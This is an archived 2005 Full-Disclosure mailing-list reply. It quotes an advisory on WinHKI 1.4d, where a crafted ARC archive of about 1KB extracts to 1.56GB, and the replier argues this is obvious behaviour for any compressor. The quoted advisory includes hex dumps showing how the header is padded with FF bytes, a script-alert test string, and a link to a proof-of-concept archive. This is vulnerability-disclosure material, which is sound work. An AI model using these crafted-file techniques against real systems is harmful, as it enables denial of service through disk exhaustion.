Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

From: bipin gautam (visitbipin_at_yahoo.com)
Date: 01/08/05

  • Next message: Frank Dietrich: "Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected"
    Date: Sat, 8 Jan 2005 01:29:30 -0800 (PST)
    To: full-disclosure@lists.netsys.com
    
    

    that's obvious isn't it... say... if you create a few
    GB file with null characters, 0X00 and compress
    it...... that will produce a similar result. such
    issue is known for any file compress utility for ages.

    any... software will do the same! try it. and THAT'S
    OBVIOUS!
    --- "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
    wrote:

    >
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > Application: WinHKI
    > Vendors: http://www.webtoolmaster.com
    > Versions: 1.4d
    > Platforms: Windows
    > Bug: ARC File Extraction of 1KB to 1.56GB
    > Exploitation: Local (extract file)
    > Date: 24 Dec 2004
    > Author: Rafel Ivgi, The-Insider
    > E-Mail: the_insider@mail.com
    > Website: http://theinsider.deep-ice.com
    >
    >
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > 1) Introduction
    > 2) Bugs
    > 3) The Code
    >
    >
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > ===============
    > 1) Introduction
    > ===============
    >
    > WinHKI is a file archiever which supports: ARC, BH,
    > CAB, HKI, JAR, LHA,TAR,
    >
    > GZ compressions.
    >
    >
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > ======
    > 2) Bug
    > ======
    >
    > This is a normal CAB compressed file header
    >
    > 00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B
    > ..251.HTM.^^^^^.
    > 00000010 0000 0078 3139 73B5 121B 0000 003C 7363
    > ...x19s......<sc
    > 00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73
    > ript.>alert()</s
    > 00000030 6372 6970 743E 0D0A 1A00
    > cript>....
    >
    > By adding after the filename header a certain amount
    > of chars
    > and replacing all nulls (00) with FF (in order to
    > avoid our
    > long string from being terminated)
    >
    > 00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF
    > ..251.HTM.^^^^^.
    > 00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    > ................
    > 00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B
    > ................
    > 00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363
    > ...x19s......<sc
    > 00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73
    > ript.>alert()</s
    > 00000430 6372 6970 743E 0D0A 1A00
    > cript>....
    >
    >
    > HKI will create a 1.56 GIGA BYTE file on at the
    > selected extract location.
    >
    >
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > ===========
    > 3) The Code
    > ===========
    >
    > An online proof of concept can be found at:
    > http://theinsider.deep-ice.com/hki156gb.ARC
    >
    >
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > ---
    > Rafel Ivgi, The-Insider
    > http://theinsider.deep-ice.com
    >
    > "Scripts and Codes will make me D.O.S , but they
    > will never HACK me."
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter:
    > http://lists.netsys.com/full-disclosure-charter.html
    >

                    
    __________________________________
    Do you Yahoo!?
    Yahoo! Mail - Easier than ever with enhanced search. Learn more.
    http://info.mail.yahoo.com/mail_250
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Frank Dietrich: "Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected"

    Relevant Pages

    • Re: Attach pics and files
      ... I'm not a Yahoo user so don't know much about it... ... Just go to the Yahoo site and manage your mail... ... including attachments. ... trying to compress and e-mail the document... ...
      (microsoft.public.windowsxp.photos)
    • Re: Has anyone HEARD 5.1 Love yet? ( Terra )
      ... I never read email at the Yahoo address! ... instead of going for quality sound on DVD, they want to compress the shit ... reality, in REALITY, music does not, or is not meant to, run circles ...
      (rec.music.beatles)
    • Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB
      ... of nulls...that is not obvious, that is a bug. ... WinHKI - ARC File Extraction of 1KB to 1.56GB ... > issue is known for any file compress utility for ages. ... > Do you Yahoo!? ...
      (Full-Disclosure)